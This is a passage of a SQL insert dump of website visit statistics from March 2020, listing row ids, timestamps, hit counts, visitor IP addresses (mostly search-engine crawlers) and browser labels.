.249.70.36','chrome'),(487527,1583799192,1,1,0,0,'66.249.64.27','chrome'),(487528,1583799532,38,38,0,0,'107.173.222.105','firefox'),(487529,1583799538,2,2,0,0,'107.173.222.105','other'),(487530,1583799987,2,2,0,0,'66.249.70.62','chrome'),(487531,1583800206,1,1,0,0,'207.46.13.181','other'),(487532,1583801094,2,2,0,0,'66.249.64.28','chrome'),(487533,1583801714,1,1,0,0,'62.205.134.182','other'),(487534,1583802294,1,1,0,0,'66.249.64.26','chrome'),(487535,1583802493,1,1,0,0,'66.249.64.27','chrome'),(487536,1583802837,1,1,0,0,'178.154.171.134','other'),(487537,1583803090,1,1,0,0,'66.249.70.36','chrome'),(487538,1583803440,1,1,0,0,'66.249.70.33','chrome'),(487539,1583804327,1,1,0,0,'178.154.171.127','other'),(487540,1583804833,1,0,1,0,'66.249.64.28',''),(487541,1583805945,1,1,0,0,'178.154.171.127','other'),(487542,1583806416,1,1,0,0,'195.234.215.67','other'),(487543,1583807149,4,4,0,0,'178.154.171.134','other'),(487544,1583807419,1,1,0,0,'141.8.183.73','other'),(487545,1583807669,1,1,0,0,'66.249.70.62','chrome'),(487546,1583807828,1,1,0,0,'66.249.64.26','chrome'),(487547,1583807963,1,1,0,0,'66.249.64.27','chrome'),(487548,1583808074,2,2,0,0,'178.154.171.127','other'),(487549,1583808343,1,1,0,0,'8.29.198.25','other'),(487550,1583808702,1,1,0,0,'8.29.198.26','other'),(487551,1583810071,2,2,0,0,'66.249.64.28','chrome'),(487552,1583811418,1,1,0,0,'66.249.64.27','chrome'),(487553,1583811475,2,2,0,0,'178.154.171.134','other'),(487554,1583811478,1,1,0,0,'178.154.171.127','other'),(487555,1583811779,1,1,0,0,'66.249.64.28','chrome'),(487556,1583812684,1,1,0,0,'178.154.171.127','other'),(487557,1583813169,1,1,0,0,'207.46.13.57','other'),(487558,1583815052,1,1,0,0,'66.249.64.26','chrome'),(487559,1583815089,1,1,0,0,'178.154.171.127','other'),(487560,1583816623,1,1,0,0,'178.154.171.127','other'),(487561,1583816651,1,1,0,0,'31.13.115.18','other'),(487562,1583816652,1,1,0,0,'31.13.115.10','other'),(487564,1583817485,1,1,0,0,'178.154.171.134','other'),(487565,1583818294,1,1,0,0,'141.8.142.86','other'),(487566,1583818515,2,2,0,0,'66.249.64.26','chrome'),(487567,1583818755,1,1,0,0,'62.205.134.182','other'),(487568,1583818897,1,1,0,0,'66.249.64.27','chrome'),(487569,1583819182,1,1,0,0,'8.29.198.26','other'),(487570,1583819231,3,3,0,0,'178.154.171.134','other'),(487571,1583819396,1,1,0,0,'207.46.13.181','other'),(487572,1583819552,2,2,0,0,'195.123.225.48','firefox'),(487573,1583819556,1,1,0,0,'8.29.198.25','other'),(487574,1583820499,1,1,0,0,'178.154.171.127','other'),(487575,1583820520,1,1,0,0,'141.8.142.2','other'),(487576,1583820603,1,1,0,0,'195.128.17.206','other'),(487577,1583820793,1,1,0,0,'109.252.53.28','chrome'),(487578,1583821355,1,1,0,0,'178.159.37.88','chrome'),(487579,1583822225,1,1,0,0,'141.8.132.28','other'),(487580,1583822420,1,1,0,0,'66.249.64.28','chrome'),(487581,1583822654,1,1,0,0,'178.154.171.127','other'),(487582,1583822787,1,1,0,0,'207.46.13.57','other'),(487583,1583823193,1,1,0,0,'178.154.171.134','other'),(487584,1583823563,1,1,0,0,'91.196.178.78','chrome'),(487585,1583824455,1,1,0,0,'66.249.70.33','chrome'),(487586,1583824553,2,2,0,0,'178.154.171.134','other'),(487587,1583825141,1,1,0,0,'91.196.178.94','chrome'),(487588,1583825637,1,1,0,0,'207.46.13.181','other'),(487589,1583826277,2,2,0,0,'207.46.13.57','other'),(487590,1583826279,1,1,0,0,'91.196.178.186','chrome'),(487591,1583826709,2,2,0,0,'91.196.178.181','chrome'),(487592,1583826867,1,1,0,0,'37.9.113.202','other'),(487593,1583827379,1,1,0,0,'91.196.178.94','chrome'),(487594,1583827845,1,1,0,0,'207.46.13.57','other'),(487595,1583828657,1,1,0,0,'178.154.171.127','other'),(487596,1583828949,1,1,0,0,'91.196.178.65','chrome'),(487597,1583829446,1,1,0,0,'141.8.132.12','other'),(487598,1583829474,1,1,0,0,'207.46.13.181','other'),(487599,1583829604,1,1,0,0,'178.154.171.134','other'),(487600,1583829644,1,1,0,0,'31.13.127.13','other'),(487601,1583829645,2,2,0,0,'31.13.127.10','other'),(487602,1583830048,1,1,0,0,'8.29.198.27','other'),(487603,1583830067,1,1,0,0,'66.249.64.28','chrome'),(487604,1583830196,37,37,0,0,'148.251.70.179','other'),(487605,1583830408,1,1,0,0,'8.29.198.26','other'),(487606,1583830981,1,1,0,0,'66.249.64.28','chrome'),(487607,1583831921,3,3,0,0,'178.154.171.134','other'),(487608,1583832862,2,2,0,0,'178.154.171.134','other'),(487609,1583832955,1,1,0,0,'66.249.64.26','chrome'),(487610,1583833073,1,1,0,0,'66.249.64.28','chrome'),(487611,1583833114,1,1,0,0,'66.249.64.27','chrome'),(487612,1583833948,1,1,0,0,'37.73.137.113','chrome'),(487613,1583834494,1,1,0,0,'66.249.64.26','chrome'),(487614,1583834562,1,1,0,0,'66.249.64.28','chrome'),(487615,1583834768,1,1,0,0,'157.55.39.96','other'),(487616,1583835090,1,1,0,0,'91.196.178.186','chrome'),(487617,1583835826,1,1,0,0,'34.205.171.191','chrome'),(487618,1583835962,1,1,0,0,'91.196.178.94','chrome'),(487619,1583836012,1,1,0,0,'178.154.171.134','other'),(487620,1583836631,1,1,0,0,'207.46.13.181','other'),(487621,1583837162,1,1,0,0,'178.154.171.134','other'),(487622,1583837724,1,1,0,0,'141.8.142.2','other'),(487623,1583837983,1,1,0,0,'66.249.64.27','chrome'),(487624,1583838170,1,1,0,0,'66.249.64.28','chrome'),(487625,1583838186,1,1,0,0,'37.9.113.39','other'),(487626,1583838479,1,1,0,0,'66.249.64.26','chrome'),(487627,1583838810,1,0,1,0,'157.55.39.96',''),(487628,1583839187,1,1,0,0,'178.154.171.127','other'),(487629,1583839843,1,1,0,0,'207.46.13.181','other'),(487630,1583840187,1,1,0,0,'66.249.64.26','chrome'),(487631,1583840328,2,2,0,0,'66.249.64.28','chrome'),(487632,1583840622,1,1,0,0,'178.154.171.134','other'),(487633,1583840632,1,1,0,0,'91.196.177.46','chrome'),(487634,1583840910,1,1,0,0,'8.29.198.26','other'),(487635,1583840931,1,1,0,0,'207.46.13.181','other'),(487636,1583841181,37,37,0,0,'5.9.70.72','other'),(487637,1583841312,1,1,0,0,'8.29.198.27','other'),(487638,1583841981,2,2,0,0,'207.46.13.57','other'),(487639,1583842019,1,1,0,0,'66.249.70.33','chrome'),(487640,1583842031,2,2,0,0,'66.249.64.26','chrome'),(487641,1583842867,1,1,0,0,'87.250.224.90','other'),(487642,1583843049,1,1,0,0,'207.46.13.57','other'),(487643,1583843120,1,1,0,0,'157.55.39.96','other'),(487644,1583843294,2,2,0,0,'66.249.64.28','chrome'),(487645,1583843311,1,1,0,0,'95.108.181.103','other'),(487646,1583843373,1,1,0,0,'91.196.178.65','firefox'),(487647,1583843700,1,1,0,0,'207.46.13.181','other'),(487648,1583843882,1,1,0,0,'109.74.154.72','chrome'),(487649,1583844264,1,1,0,0,'192.162.227.75','chrome'),(487650,1583844792,1,1,0,0,'157.55.39.96','other'),(487651,1583844973,1,1,0,0,'66.249.64.28','chrome'),(487652,1583845024,2,2,0,0,'207.46.13.181','other'),(487653,1583845626,2,2,0,0,'178.154.171.127','other'),(487654,1583845943,1,1,0,0,'91.196.178.142','firefox'),(487655,1583846122,1,1,0,0,'207.46.13.57','other'),(487656,1583846874,1,1,0,0,'213.180.203.186','other'),(487657,1583847229,1,1,0,0,'66.249.64.27','chrome'),(487658,1583847260,2,2,0,0,'213.180.203.218','other'),(487659,1583848067,1,1,0,0,'207.46.13.57','other'),(487660,1583848335,1,1,0,0,'157.55.39.96','other'),(487661,1583848370,1,1,0,0,'91.196.178.56','chrome'),(487662,1583848478,1,1,0,0,'91.196.178.169','chrome'),(487663,1583848535,1,1,0,0,'91.196.179.134','chrome'),(487664,1583848691,1,1,0,0,'103.36.125.225','firefox'),(487665,1583849105,1,1,0,0,'178.154.171.127','other'),(487666,1583849151,1,0,1,0,'207.46.13.57',''),(487667,1583849177,1,1,0,0,'46.211.224.24','chrome'),(487668,1583850135,1,0,1,0,'207.46.13.57',''),(487669,1583850278,1,1,0,0,'69.4.89.106','firefox'),(487670,1583850279,1,1,0,0,'69.4.89.106','other'),(487671,1583850799,1,1,0,0,'91.196.178.169','chrome'),(487672,1583851229,1,1,0,0,'66.249.64.23','chrome'),(487673,1583851258,1,1,0,0,'178.154.171.134','other'),(487674,1583851505,1,1,0,0,'66.249.64.24','chrome'),(487675,1583851765,1,1,0,0,'8.29.198.26','other'),(487676,1583852170,1,1,0,0,'8.29.198.25','other'),(487677,1583852532,1,1,0,0,'178.154.171.134','other'),(487678,1583853119,1,1,0,0,'66.249.64.24','chrome'),(487679,1583854131,1,1,0,0,'54.36.149.28','other'),(487680,1583854742,1,1,0,0,'91.196.178.164','chrome'),(487681,1583855808,1,1,0,0,'66.249.64.25','chrome'),(487682,1583855859,12,12,0,0,'172.241.112.83','other'),(487683,1583855966,1,1,0,0,'54.36.149.48','other'),(487684,1583856106,1,1,0,0,'66.249.64.24','chrome'),(487685,1583856355,1,1,0,0,'54.36.149.79','other'),(487686,1583856782,1,1,0,0,'54.36.149.27','other'),(487687,1583857299,2,2,0,0,'66.249.64.24','chrome'),(487688,1583857443,1,0,1,0,'207.46.13.57',''),(487689,1583857513,2,2,0,0,'66.249.64.23','chrome'),(487690,1583857531,2,2,0,0,'207.46.13.57','other'),(487691,1583857761,1,0,1,0,'66.249.64.25',''),(487692,1583857933,1,1,0,0,'157.55.39.96','other'),(487693,1583858095,1,1,0,0,'91.196.178.164','chrome'),(487694,1583858125,1,1,0,0,'54.36.149.40','other'),(487695,1583859259,1,1,0,0,'54.36.149.32','other'),(487696,1583859361,1,1,0,0,'91.196.178.65','firefox'),(487697,1583860790,1,1,0,0,'178.154.171.127','other'),(487698,1583860913,1,1,0,0,'66.249.70.38','chrome'),(487699,1583861385,1,1,0,0,'66.249.64.25','chrome'),(487700,1583862339,2,2,0,0,'66.249.70.33','chrome'),(487701,1583862408,1,1,0,0,'66.249.64.24','chrome'),(487702,1583862553,1,1,0,0,'66.249.70.38','chrome'),(487703,1583862629,2,2,0,0,'8.29.198.27','other'),(487704,1583862719,1,1,0,0,'66.249.64.23','chrome'),(487705,1583862945,1,1,0,0,'66.249.64.25','chrome'),(487706,1583863789,1,1,0,0,'66.249.70.38','chrome'),(487707,1583866390,1,1,0,0,'141.8.132.12','other'),(487708,1583866728,1,1,0,0,'54.36.149.72','other'),(487709,1583867481,1,1,0,0,'54.36.149.104','other'),(487710,1583867539,2,2,0,0,'66.249.64.24','chrome'),(487711,1583867742,1,1,0,0,'157.55.39.96','other'),(487712,1583868675,1,1,0,0,'37.9.113.177','other'),(487713,1583868679,1,1,0,0,'157.55.39.96','other'),(487714,1583869595,2,2,0,0,'66.249.64.23','chrome'),(487715,1583869792,1,1,0,0,'66.249.70.36','chrome'),(487716,1583870227,1,1,0,0,'37.9.113.6','other'),(487717,1583870777,1,1,0,0,'66.249.70.36','chrome'),(487718,1583872340,1,1,0,0,'91.196.178.61','chrome'),(487719,1583872530,1,1,0,0,'141.8.183.18','other'),(487720,1583873479,1,1,0,0,'141.8.142.115','other'),(487721,1583873500,1,1,0,0,'8.29.198.25','other'),(487722,1583873611,1,1,0,0,'66.249.64.23','chrome'),(487723,1583873723,1,1,0,0,'54.36.149.31','other'),(487724,1583873922,1,1,0,0,'8.29.198.27','other'),(487725,1583874074,3,3,0,0,'5.9.98.234','other'),(487726,1583874972,1,1,0,0,'141.8.142.177','other'),(487727,1583875001,1,0,1,0,'66.249.64.25',''),(487728,1583875441,1,1,0,0,'46.211.139.149','chrome'),(487729,1583875502,1,1,0,0,'17.58.101.25','other'),(487730,1583875536,1,1,0,0,'54.36.149.94','other'),(487731,1583876682,1,1,0,0,'62.210.83.78','firefox'),(487732,1583877174,3,3,0,0,'157.55.39.96','other'),(487733,1583877420,1,1,0,0,'54.36.149.8','other'),(487734,1583878322,1,1,0,0,'209.17.96.122','other'),(487735,1583878594,1,1,0,0,'66.249.64.25','chrome'),(487736,1583878812,1,1,0,0,'141.8.142.2','other'),(487737,1583879992,1,1,0,0,'54.36.149.23','other'),(487738,1583880530,1,1,0,0,'178.154.171.127','other'),(487739,1583881099,1,1,0,0,'54.36.149.75','other'),(487740,1583881938,2,2,0,0,'178.154.171.134','other'),(487741,1583882585,1,0,1,0,'66.249.64.25',''),(487742,1583882629,1,0,1,0,'66.249.64.24',''),(487743,1583882734,1,1,0,0,'178.154.171.127','other'),(487744,1583883440,1,1,0,0,'66.249.64.25','chrome'),(487745,1583883722,1,1,0,0,'66.249.64.23','chrome'),(487746,1583883932,2,2,0,0,'31.13.103.15','other'),(487747,1583883933,1,1,0,0,'31.13.103.20','other'),(487748,1583883935,1,1,0,0,'31.13.103.17','other'),(487750,1583884409,1,1,0,0,'8.29.198.25','other'),(487751,1583884450,1,1,0,0,'66.249.70.33','chrome'),(487752,1583884894,1,1,0,0,'8.29.198.27','other'),(487753,1583885267,2,2,0,0,'66.249.64.23','chrome'),(487754,1583885277,4,4,0,0,'66.249.64.24','chrome'),(487755,1583885436,1,1,0,0,'66.249.70.33','chrome'),(487756,1583886776,1,1,0,0,'178.154.171.134','other'),(487757,1583887155,1,1,0,0,'66.249.70.38','chrome'),(487758,1583887205,1,1,0,0,'178.154.171.127','other'),(487759,1583887286,1,1,0,0,'66.249.64.23','chrome'),(487760,1583888115,1,1,0,0,'62.205.134.182','other'),(487761,1583888808,1,1,0,0,'66.249.64.24','chrome'),(487762,1583891485,1,0,1,0,'66.249.64.25',''),(487763,1583892450,1,1,0,0,'66.249.64.30','chrome'),(487764,1583893033,1,1,0,0,'178.154.171.127','other'),(487765,1583893611,1,1,0,0,'141.8.142.2','other'),(487766,1583893731,1,1,0,0,'54.36.149.9','other'),(487767,1583895264,1,1,0,0,'66.249.64.23','chrome'),(487768,1583895357,1,1,0,0,'8.29.198.26','other'),(487769,1583895832,1,1,0,0,'8.29.198.27','other'),(487770,1583896329,1,1,0,0,'66.249.64.24','chrome'),(487771,1583897919,1,1,0,0,'54.36.149.64','other'),(487772,1583898151,1,1,0,0,'54.36.149.94','other'),(487773,1583899992,1,1,0,0,'54.36.149.52','other'),(487774,1583900444,1,1,0,0,'66.249.64.23','chrome'),(487775,1583900530,3,3,0,0,'66.249.64.25','chrome'),(487776,1583900702,1,1,0,0,'54.36.149.35','other'),(487777,1583901155,1,1,0,0,'66.249.70.36','chrome'),(487778,1583901508,1,1,0,0,'54.36.149.24','other'),(487779,1583901659,1,1,0,0,'54.36.149.65','other'),(487780,1583902427,1,0,1,0,'66.249.64.23',''),(487781,1583902583,1,1,0,0,'66.249.70.38','chrome'),(487782,1583903282,1,1,0,0,'66.249.70.33','chrome'),(487783,1583903514,1,1,0,0,'17.58.101.25','other'),(487784,1583904856,1,1,0,0,'178.154.171.127','other'),(487785,1583905191,1,1,0,0,'17.58.101.25','other'),(487786,1583905335,1,1,0,0,'62.205.134.182','other'),(487787,1583905702,1,1,0,0,'66.249.64.24','chrome'),(487788,1583906212,1,1,0,0,'66.249.70.38','chrome'),(487789,1583906217,1,1,0,0,'66.249.64.25','chrome'),(487790,1583906258,2,2,0,0,'8.29.198.25','other'),(487791,1583906600,1,1,0,0,'91.196.177.46','chrome'),(487792,1583908116,1,1,0,0,'178.154.171.134','other'),(487793,1583909101,1,1,0,0,'54.36.149.52','other'),(487794,1583909210,1,1,0,0,'66.249.64.25','chrome'),(487795,1583909761,1,1,0,0,'178.154.171.134','other'),(487796,1583910318,1,1,0,0,'91.196.178.94','chrome'),(487797,1583910347,1,1,0,0,'54.36.149.34','other'),(487798,1583910492,1,1,0,0,'66.249.64.23','chrome'),(487799,1583910742,1,1,0,0,'178.154.171.127','other'),(487800,1583912083,1,1,0,0,'54.36.149.66','other'),(487801,1583912193,1,1,0,0,'54.36.149.14','other'),(487802,1583912393,1,1,0,0,'54.36.149.36','other'),(487803,1583912952,1,1,0,0,'195.230.119.58','chrome'),(487804,1583913259,1,1,0,0,'54.36.149.42','other'),(487805,1583914520,1,1,0,0,'17.58.101.25','other'),(487806,1583915193,1,1,0,0,'91.196.178.94','chrome'),(487807,1583915955,1,1,0,0,'66.249.64.25','chrome'),(487808,1583917143,1,1,0,0,'8.29.198.27','other'),(487809,1583917660,1,1,0,0,'8.29.198.26','other'),(487810,1583917841,1,1,0,0,'66.249.64.24','chrome'),(487811,1583917933,1,0,1,0,'66.249.64.25',''),(487812,1583918919,1,1,0,0,'66.249.64.24','chrome'),(487813,1583918995,1,1,0,0,'66.249.64.25','chrome'),(487814,1583919562,1,1,0,0,'18.206.45.158','chrome'),(487815,1583920139,1,1,0,0,'178.154.171.134','other'),(487816,1583920427,1,1,0,0,'31.13.127.1','other'),(487817,1583920428,1,1,0,0,'31.13.127.7','other'),(487818,1583920429,1,1,0,0,'31.13.127.18','other'),(487819,1583920686,1,1,0,0,'193.107.72.71','chrome'),(487820,1583920816,1,1,0,0,'91.196.178.164','chrome'),(487821,1583920959,2,2,0,0,'66.249.64.25','chrome'),(487822,1583921448,1,1,0,0,'66.249.64.23','chrome'),(487823,1583921680,1,1,0,0,'91.192.200.14','chrome'),(487824,1583922042,1,1,0,0,'66.249.70.36','chrome'),(487825,1583922388,1,1,0,0,'66.249.64.23','chrome'),(487826,1583922391,2,2,0,0,'66.249.64.24','chrome'),(487827,1583923267,1,1,0,0,'17.58.101.25','other'),(487828,1583924021,2,2,0,0,'66.249.64.24','chrome'),(487829,1583924450,1,1,0,0,'178.154.171.134','other'),(487830,1583924515,1,1,0,0,'91.196.177.147','chrome'),(487831,1583924633,2,2,0,0,'95.213.141.126','opera'),(487832,1583924936,1,1,0,0,'66.249.64.25','chrome'),(487833,1583925735,1,1,0,0,'141.8.183.33','other'),(487834,1583926975,1,1,0,0,'66.249.64.24','chrome'),(487835,1583927226,1,1,0,0,'54.36.149.103','other'),(487836,1583928034,1,1,0,0,'8.29.198.25','other'),(487837,1583928068,1,1,0,0,'37.113.62.22','chrome'),(487838,1583928252,1,1,0,0,'66.249.64.25','chrome'),(487839,1583928591,1,1,0,0,'8.29.198.26','other'),(487840,1583929007,1,1,0,0,'109.74.154.72','chrome'),(487841,1583929073,1,1,0,0,'91.196.178.157','firefox'),(487842,1583929191,1,1,0,0,'91.196.177.147','chrome'),(487843,1583929558,2,2,0,0,'91.196.178.187','chrome'),(487844,1583929773,1,1,0,0,'66.249.64.23','chrome'),(487845,1583930431,1,1,0,0,'66.249.64.24','chrome'),(487846,1583930445,1,1,0,0,'66.249.70.36','chrome'),(487847,1583930730,1,1,0,0,'54.36.149.72','other'),(487848,1583931285,1,1,0,0,'91.196.178.94','chrome'),(487849,1583931762,1,1,0,0,'91.196.177.46','chrome'),(487850,1583931827,8,8,0,0,'66.249.64.23','chrome'),(487851,1583931978,5,5,0,0,'66.249.64.24','chrome'),(487852,1583932003,1,1,0,0,'66.249.70.33','chrome'),(487853,1583932040,2,2,0,0,'66.249.64.25','chrome'),(487854,1583932118,1,1,0,0,'91.196.177.15','chrome'),(487855,1583932439,1,1,0,0,'185.84.148.4','chrome'),(487856,1583932725,1,1,0,0,'91.196.178.94','chrome'),(487857,1583933221,1,1,0,0,'54.36.149.43','other'),(487858,1583933696,1,1,0,0,'54.36.149.99','other'),(487859,1583933958,1,1,0,0,'66.249.70.38','chrome'),(487860,1583934105,1,1,0,0,'213.180.203.186','other'),(487861,1583934149,1,1,0,0,'213.180.203.13','other'),(487862,1583934261,3,3,0,0,'66.249.64.24','chrome'),(487863,1583934267,5,5,0,0,'66.249.64.23','chrome'),(487864,1583934581,1,1,0,0,'54.36.149.38','other'),(487865,1583934897,1,1,0,0,'157.245.213.191','chrome'),(487866,1583935170,2,2,0,0,'66.249.64.23','chrome'),(487867,1583935187,3,3,0,0,'66.249.64.24','chrome'),(487868,1583935405,1,1,0,0,'54.36.149.13','other'),(487869,1583935698,1,1,0,0,'66.249.70.36','chrome'),(487870,1583935861,2,2,0,0,'91.196.178.187','chrome'),(487871,1583936309,1,1,0,0,'54.36.149.103','other'),(487872,1583936831,1,1,0,0,'213.180.203.186','other'),(487873,1583937674,2,2,0,0,'66.249.64.23','chrome'),(487874,1583938395,1,1,0,0,'66.249.64.24','chrome'),(487875,1583938756,1,1,0,0,'91.196.178.78','chrome'),(487876,1583938812,1,1,0,0,'66.249.64.23','chrome'),(487877,1583938910,1,1,0,0,'8.29.198.25','other'),(487878,1583939480,3,3,0,0,'95.132.7.126','chrome'),(487879,1583939510,1,1,0,0,'8.29.198.27','other'),(487880,1583940375,1,1,0,0,'66.249.70.38','chrome'),(487881,1583940412,3,3,0,0,'66.249.64.24','chrome'),(487882,1583940603,3,3,0,0,'66.249.64.25','chrome'),(487883,1583941141,1,1,0,0,'66.249.64.23','chrome'),(487884,1583941336,1,1,0,0,'91.196.178.85','firefox'),(487885,1583941670,3,3,0,0,'66.249.64.25','chrome'),(487886,1583942076,1,1,0,0,'94.153.22.0','chrome'),(487887,1583942498,1,1,0,0,'66.249.70.38','chrome'),(487888,1583942611,2,2,0,0,'66.249.64.25','chrome'),(487889,1583944155,1,1,0,0,'66.249.70.38','chrome'),(487890,1583944226,3,3,0,0,'66.249.64.25','chrome'),(487891,1583944359,1,1,0,0,'66.249.64.23','chrome'),(487892,1583944697,1,1,0,0,'91.196.178.94','chrome'),(487893,1583944837,1,1,0,0,'213.180.203.218','other'),(487894,1583944931,1,1,0,0,'213.180.203.186','other'),(487895,1583945992,1,1,0,0,'46.211.50.69','chrome'),(487896,1583946012,1,1,0,0,'91.196.177.46','chrome'),(487897,1583947627,3,3,0,0,'66.249.64.23','chrome'),(487898,1583948066,1,1,0,0,'213.180.203.186','other'),(487899,1583948103,3,2,1,0,'66.249.64.24',''),(487900,1583948663,1,1,0,0,'66.249.70.36','chrome'),(487901,1583949249,1,1,0,0,'46.211.50.69','chrome'),(487902,1583949289,1,1,0,0,'66.249.70.33','chrome'),(487903,1583950782,1,1,0,0,'46.211.50.69','chrome'),(487904,1583950873,1,1,0,0,'8.29.198.25','other'),(487905,1583951224,1,1,0,0,'66.249.70.38','chrome'),(487906,1583951284,1,1,0,0,'66.249.64.25','chrome'),(487907,1583951345,2,2,0,0,'66.249.64.23','chrome'),(487908,1583951439,1,1,0,0,'138.246.253.15','chrome'),(487909,1583951515,3,3,0,0,'66.249.64.24','chrome'),(487910,1583951594,2,2,0,0,'213.180.203.186','other'),(487911,1583952071,1,1,0,0,'46.211.50.69','chrome'),(487912,1583952505,1,1,0,0,'66.249.64.24','chrome'),(487913,1583953171,1,1,0,0,'66.249.70.36','chrome'),(487914,1583953340,1,1,0,0,'66.249.64.23','chrome'),(487915,1583953650,1,1,0,0,'66.249.64.25','chrome'),(487916,1583954008,1,1,0,0,'66.249.70.33','chrome'),(487917,1583954715,1,1,0,0,'66.249.64.23','chrome'),(487918,1583955057,1,1,0,0,'91.196.178.18','other'),(487919,1583956435,1,0,1,0,'66.249.64.24',''),(487920,1583956985,1,1,0,0,'66.249.64.25','chrome'),(487921,1583956991,1,1,0,0,'66.249.70.33','chrome'),(487922,1583957151,3,3,0,0,'66.249.64.24','chrome'),(487923,1583957381,2,2,0,0,'66.249.64.23','chrome'),(487924,1583958674,2,2,0,0,'66.249.64.24','chrome'),(487925,1583958677,4,4,0,0,'66.249.64.23','chrome'),(487926,1583958918,1,1,0,0,'66.249.64.25','chrome'),(487927,1583958933,2,2,0,0,'66.249.70.33','chrome'),(487928,1583959090,1,1,0,0,'213.180.203.218','other'),(487929,1583959450,1,1,0,0,'162.210.196.129','other'),(487930,1583959904,1,1,0,0,'66.249.70.33','chrome'),(487931,1583959911,1,1,0,0,'66.249.64.24','chrome'),(487932,1583960819,1,1,0,0,'213.180.203.186','other'),(487933,1583961097,1,1,0,0,'8.29.198.25','other'),(487934,1583961167,1,0,1,0,'51.68.50.3',''),(487935,1583961795,1,1,0,0,'8.29.198.26','other'),(487936,1583961826,1,1,0,0,'213.180.203.186','other'),(487937,1583962093,1,1,0,0,'66.249.70.38','chrome'),(487938,1583962119,1,1,0,0,'66.249.70.33','chrome'),(487939,1583963135,1,1,0,0,'213.180.203.186','other'),(487940,1583963635,1,1,0,0,'213.180.203.132','other'),(487941,1583963724,1,1,0,0,'66.249.64.23','chrome'),(487942,1583964432,1,1,0,0,'66.249.64.25','chrome'),(487943,1583964588,1,1,0,0,'66.249.70.33','chrome'),(487944,1583965015,2,2,0,0,'66.249.64.23','chrome'),(487945,1583965913,3,3,0,0,'66.249.64.24','chrome'),(487946,1583965940,1,1,0,0,'5.45.207.87','other'),(487947,1583966429,1,1,0,0,'66.249.64.23','chrome'),(487948,1583966504,1,1,0,0,'66.249.64.25','chrome'),(487949,1583966797,3,3,0,0,'66.249.70.36','chrome'),(487950,1583967353,1,1,0,0,'178.154.171.127','other'),(487951,1583967571,1,0,1,0,'66.249.64.25',''),(487952,1583967753,3,3,0,0,'66.249.64.24','chrome'),(487953,1583968097,1,1,0,0,'178.154.171.134','other'),(487954,1583968714,3,3,0,0,'66.249.70.38','chrome'),(487955,1583968732,1,1,0,0,'66.249.70.36','chrome'),(487956,1583968995,2,2,0,0,'66.249.64.24','chrome'),(487957,1583969180,1,1,0,0,'178.154.171.127','other'),(487958,1583969208,1,1,0,0,'66.249.64.25','chrome'),(487959,1583969212,1,1,0,0,'178.154.171.134','other'),(487960,1583969641,2,2,0,0,'66.249.64.23','chrome'),(487961,1583970615,2,2,0,0,'66.249.64.23','chrome'),(487962,1583970975,1,1,0,0,'66.249.70.36','chrome'),(487963,1583971964,2,2,0,0,'8.29.198.25','other'),(487964,1583972130,1,1,0,0,'66.249.64.24','chrome'),(487965,1583973988,8,8,0,0,'46.4.13.103','chrome'),(487966,1583974012,1,1,0,0,'66.249.64.25','chrome'),(487967,1583974514,1,1,0,0,'62.205.134.182','other'),(487968,1583975505,1,1,0,0,'66.249.70.36','chrome'),(487969,1583976262,1,1,0,0,'66.249.64.24','chrome'),(487970,1583976358,1,1,0,0,'178.154.171.134','other'),(487971,1583977056,1,1,0,0,'66.249.70.33','chrome'),(487972,1583977325,1,0,1,0,'66.249.64.23',''),(487973,1583977466,2,2,0,0,'66.249.64.23','chrome'),(487974,1583977487,2,2,0,0,'66.249.64.24','chrome'),(487975,1583977604,1,1,0,0,'66.249.70.38','chrome'),(487976,1583978615,2,2,0,0,'66.249.64.24','chrome'),(487977,1583978696,1,1,0,0,'66.249.64.25','chrome'),(487978,1583978882,3,3,0,0,'66.249.64.23','chrome'),(487979,1583979876,1,1,0,0,'141.8.142.2','other'),(487980,1583980060,2,2,0,0,'66.249.64.25','chrome'),(487981,1583980086,1,1,0,0,'66.249.70.33','chrome'),(487982,1583980150,2,2,0,0,'66.249.64.24','chrome'),(487983,1583980193,1,1,0,0,'66.249.70.36','chrome'),(487984,1583980370,2,2,0,0,'178.154.171.134','other'),(487985,1583981723,1,1,0,0,'66.249.64.23','chrome'),(487986,1583981925,3,3,0,0,'66.249.64.25','chrome'),(487987,1583981984,1,1,0,0,'66.249.70.33','chrome'),(487988,1583982493,1,1,0,0,'181.215.32.96','chrome'),(487989,1583982683,1,1,0,0,'66.249.64.23','chrome'),(487990,1583982712,1,1,0,0,'178.154.171.127','other'),(487991,1583982827,1,1,0,0,'8.29.198.25','other'),(487992,1583983084,1,1,0,0,'66.249.70.36','chrome'),(487993,1583983630,1,1,0,0,'8.29.198.27','other'),(487994,1583984297,1,1,0,0,'66.249.70.33','chrome'),(487995,1583984452,1,1,0,0,'178.154.171.134','other'),(487996,1583984846,1,1,0,0,'66.249.64.23','chrome'),(487997,1583985022,3,3,0,0,'178.150.14.250','other'),(487998,1583985934,3,3,0,0,'66.249.64.25','chrome'),(487999,1583986195,1,1,0,0,'109.172.70.141','msie'),(488000,1583986308,1,1,0,0,'66.249.70.36','chrome'),(488001,1583986782,1,1,0,0,'89.163.242.241','opera'),(488002,1583986895,1,1,0,0,'178.154.171.127','other'),(488003,1583986924,1,1,0,0,'66.249.64.25','chrome'),(488004,1583990134,1,1,0,0,'178.154.171.134','other'),(488005,1583990455,1,1,0,0,'91.196.178.166','chrome'),(488006,1583990870,1,1,0,0,'2.47.39.211','other'),(488007,1583991609,1,1,0,0,'62.205.134.182','other'),(488008,1583991919,1,1,0,0,'91.196.178.73','chrome'),(488009,1583993164,1,1,0,0,'66.249.64.23','chrome'),(488010,1583993404,1,1,0,0,'141.8.142.86','other'),(488011,1583993559,1,1,0,0,'66.249.70.36','chrome'),(488012,1583993603,1,1,0,0,'46.211.57.126','chrome'),(488013,1583993677,2,2,0,0,'8.29.198.25','other'),(488014,1583994316,1,0,1,0,'66.249.64.24',''),(488015,1583994535,1,1,0,0,'66.249.64.25','chrome'),(488016,1583994556,3,3,0,0,'66.249.64.24','chrome'),(488017,1583994627,1,1,0,0,'66.249.64.23','chrome'),(488018,1583994629,1,1,0,0,'66.249.70.38','chrome'),(488019,1583994844,2,2,0,0,'178.154.171.134','other'),(488020,1583995679,3,3,0,0,'66.249.70.33','chrome'),(488021,1583995699,4,4,0,0,'66.249.64.24','chrome'),(488022,1583995712,4,4,0,0,'66.249.64.23','chrome'),(488023,1583995752,1,1,0,0,'66.249.70.36','chrome'),(488024,1583996083,2,2,0,0,'66.249.70.38','chrome'),(488025,1583996156,2,2,0,0,'66.249.64.25','chrome'),(488026,1583996798,1,1,0,0,'31.13.127.24','other'),(488027,1583996807,4,4,0,0,'66.249.64.24','chrome'),(488